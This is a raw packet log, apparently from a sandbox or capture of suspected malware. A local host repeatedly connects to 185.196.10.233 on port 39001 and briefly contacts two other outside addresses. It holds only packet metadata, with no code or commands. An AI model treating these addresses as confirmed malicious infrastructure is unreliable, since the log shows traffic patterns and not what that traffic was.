Mar 26, 2024 18:24:07.962877989 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.191119909 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.191189051 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.396953106 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.443608046 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.629894972 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.632019997 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.741780043 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.818492889 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.818629980 CET	39001	49781	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.818691015 CET	49781	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.928495884 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:08.928589106 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:08.942082882 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.175549984 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.175620079 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.383841038 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.428014994 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.614761114 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.615458965 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.725836039 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.801969051 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.802115917 CET	39001	49782	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.802186966 CET	49782	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.912652016 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:09.912763119 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:09.936152935 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.175568104 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.175672054 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.384521961 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.428081989 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.614907980 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.615674019 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.725801945 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.802196980 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.802534103 CET	39001	49783	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.802589893 CET	49783	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.912697077 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:10.912810087 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:10.924777031 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.160031080 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.160095930 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.366946936 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.428009033 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.617050886 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.617793083 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.728538990 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.804536104 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.804626942 CET	39001	49784	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.804686069 CET	49784	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.915361881 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:11.915448904 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:11.927139044 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.159924030 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.160032988 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.366980076 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.412476063 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.599137068 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.599790096 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.711898088 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.786313057 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.786422968 CET	39001	49785	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.786504984 CET	49785	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.898909092 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:12.898978949 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:12.911211014 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.144341946 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.144424915 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.352884054 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.427999020 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.614700079 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.615367889 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.725720882 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.804291964 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.804631948 CET	39001	49786	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.804693937 CET	49786	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.912763119 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:13.912853956 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:13.935422897 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:14.176176071 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:14.176263094 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:14.384890079 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:14.427984953 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:14.614852905 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:14.615551949 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:14.805501938 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:14.805551052 CET	39001	49787	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:14.805625916 CET	49787	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:14.922431946 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:15.109146118 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:15.109463930 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:15.190381050 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:15.425554991 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:15.427576065 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:15.659884930 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:15.687336922 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:15.740534067 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:15.927324057 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:15.974889994 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:16.823077917 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:16.997562885 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.009675026 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.010077953 CET	39001	49788	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.010133028 CET	49788	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.184324026 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.184519053 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.199312925 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.425564051 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.425632000 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.631803989 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.769779921 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:17.956491947 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:17.957830906 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.085186958 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.144392967 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:18.144818068 CET	39001	49789	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:18.144880056 CET	49789	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.271899939 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:18.272002935 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.284513950 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.519272089 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:18.519341946 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:18.725543022 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:18.912388086 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.098833084 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.099472046 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.210031033 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.285953045 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.286034107 CET	39001	49790	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.286092043 CET	49790	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.396828890 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.396905899 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.420181036 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.660187960 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.660263062 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:19.868475914 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:19.928031921 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.114908934 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.116116047 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.225714922 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.302911043 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.302993059 CET	39001	49791	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.303121090 CET	49791	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.412478924 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.414602995 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.429467916 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.660079956 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.660247087 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:20.865868092 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:20.912412882 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.098865032 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.099649906 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.210570097 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.286122084 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.286201000 CET	39001	49792	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.286314011 CET	49792	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.397284031 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.397381067 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.435190916 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.675668001 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.675805092 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.881407022 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:21.928016901 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:21.968595982 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:21.968636990 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:21.968858004 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.062155008 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.062179089 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:22.114844084 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.126214981 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.245590925 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.312916040 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.312998056 CET	39001	49793	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.313071012 CET	49793	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.432106018 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.432235956 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.437171936 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:22.437257051 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.438947916 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.438956022 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:22.439244032 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:22.473174095 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.490536928 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.496941090 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:22.544234037 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:22.706773996 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.706881046 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:22.916152954 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:22.959270954 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.018841028 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:23.018923044 CET	443	49794	149.154.167.220	192.168.2.5
Mar 26, 2024 18:24:23.018981934 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:23.062975883 CET	49794	443	192.168.2.5	149.154.167.220
Mar 26, 2024 18:24:23.145744085 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.146400928 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.185066938 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:23.256918907 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.294883966 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:23.294997931 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:23.334599972 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.334883928 CET	39001	49795	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.334942102 CET	49795	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.443860054 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.447505951 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.471672058 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.483846903 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:23.633974075 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:23.706862926 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.709552050 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:23.916871071 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:23.959266901 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.145690918 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:24.151571989 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.258238077 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.338141918 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:24.338390112 CET	39001	49798	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:24.338454008 CET	49798	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.446698904 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:24.449521065 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.518799067 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.753942013 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:24.757622957 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:24.965687037 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.006162882 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.192622900 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.203749895 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.319653988 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.390372038 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.390532017 CET	39001	49799	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.390587091 CET	49799	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.506613970 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.506694078 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.526928902 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.753982067 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:25.754049063 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:25.964868069 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.006185055 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.192632914 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.193433046 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.304244041 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.379874945 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.380116940 CET	39001	49800	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.380177975 CET	49800	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.492192984 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.492299080 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.544665098 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.784899950 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:26.784965038 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:26.995691061 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.037388086 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.224087000 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.225105047 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.335432053 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.411698103 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.411897898 CET	39001	49801	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.412082911 CET	49801	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.522084951 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.522181034 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.536609888 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.769319057 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:27.771457911 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:27.978784084 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.023435116 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.209991932 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.210645914 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.319686890 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.397279978 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.397401094 CET	39001	49803	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.397471905 CET	49803	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.506469965 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.506587982 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.532572031 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.769772053 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:28.770471096 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:28.976212978 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.021778107 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.208273888 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.209158897 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.320028067 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.395632982 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.395860910 CET	39001	49804	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.395973921 CET	49804	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.506647110 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.506736994 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.519093037 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.753834009 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:29.755578041 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:29.961124897 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.006148100 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.192507029 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.193377018 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.304096937 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.379868031 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.380008936 CET	39001	49806	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.380059004 CET	49806	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.490752935 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.490875959 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.503470898 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.738120079 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.738235950 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:30.944653034 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:30.990670919 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.177160025 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.177933931 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.289268970 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.364379883 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.364571095 CET	39001	49807	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.364748955 CET	49807	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.476114035 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.476234913 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.489283085 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.722537994 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.722609043 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:31.928929090 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:31.974914074 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.161529064 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.162585974 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.308295012 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.351238012 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.351520061 CET	39001	49808	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.351576090 CET	49808	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.495156050 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.495282888 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.511658907 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.738209009 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.738333941 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:32.947009087 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:32.990556002 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:33.177002907 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:33.177804947 CET	49809	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:33.364422083 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:33.364819050 CET	39001	49809	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:33.364928007 CET	49809	39001	192.168.2.5	185.196.10.233
